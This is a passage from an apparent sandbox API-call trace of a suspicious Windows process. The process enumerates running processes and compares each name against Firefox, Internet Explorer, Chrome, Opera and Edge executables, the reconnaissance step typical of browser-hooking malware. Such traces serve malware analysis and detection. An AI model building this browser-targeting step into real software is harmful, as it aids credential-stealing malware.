(lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0255.990] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0255.990] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0255.990] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0255.990] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.990] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.990] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0255.990] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0255.990] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0255.990] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0255.990] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.990] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.991] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0255.991] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0255.991] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0255.991] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0255.991] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.991] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.991] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0255.991] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0255.991] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0255.991] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0255.991] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.991] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.992] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0255.992] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0255.992] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0255.992] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0255.992] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.992] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.992] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0255.992] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0255.992] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0255.992] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0255.993] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.993] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0255.993] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0255.993] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0255.993] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0255.993] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0255.993] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.993] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.994] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0255.994] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0255.994] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0255.994] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0255.994] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.994] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.994] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0255.994] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0255.994] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0255.994] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0255.994] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.994] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0255.995] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0255.995] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0255.995] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0255.995] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0255.995] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.995] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0255.995] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0255.995] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0255.995] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0255.995] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0255.995] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.995] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0255.996] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0255.996] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0255.996] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0255.996] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0255.996] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.996] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.996] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0255.997] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0255.997] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0255.997] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0255.997] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.997] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0255.997] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0255.997] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0255.997] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0255.997] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0255.997] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.997] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0255.998] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0255.998] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0255.998] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0255.998] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0255.998] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.998] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0255.998] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0255.998] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0255.998] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0255.998] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0255.998] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.998] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0255.999] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0255.999] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0255.999] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0255.999] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0255.999] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.999] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0255.999] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0255.999] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0255.999] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0256.000] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0256.000] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.000] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0256.000] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0256.000] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0256.000] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0256.000] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0256.000] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.000] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0256.001] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0256.001] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0256.001] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0256.001] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0256.001] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.001] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0256.001] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0256.001] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0256.001] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0256.001] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0256.001] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.001] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0256.002] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0256.002] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0256.002] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0256.002] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0256.002] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.002] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0256.002] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0256.002] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0256.003] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0256.003] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0256.003] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.003] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0256.003] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0256.003] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0256.003] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0256.003] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0256.003] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.003] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0256.004] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0256.004] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0256.004] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0256.004] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0256.004] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.004] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0256.004] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0256.004] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0256.004] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0256.004] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0256.004] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.004] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0256.005] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0256.005] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0256.005] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0256.005] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0256.005] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.005] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0256.006] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0256.006] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0256.006] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0256.006] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0256.006] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.006] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0256.006] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0256.006] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0256.006] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0256.006] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0256.006] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.006] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0256.007] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0256.007] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0256.007] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0256.007] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0256.007] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.007] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0256.007] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0256.007] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0256.007] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0256.007] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0256.007] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.007] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0256.008] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0256.008] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0256.008] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0256.008] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0256.008] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.008] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0256.008] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0256.008] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0256.009] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0256.009] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0256.009] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.009] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0256.009] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0256.009] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0256.009] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0256.009] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0256.009] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.009] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0256.010] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0256.010] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0256.010] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0256.010] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0256.010] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.010] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0256.010] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0256.010] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0256.010] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0256.010] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0256.010] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.010] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.011] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0256.011] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0256.011] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0256.011] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0256.011] 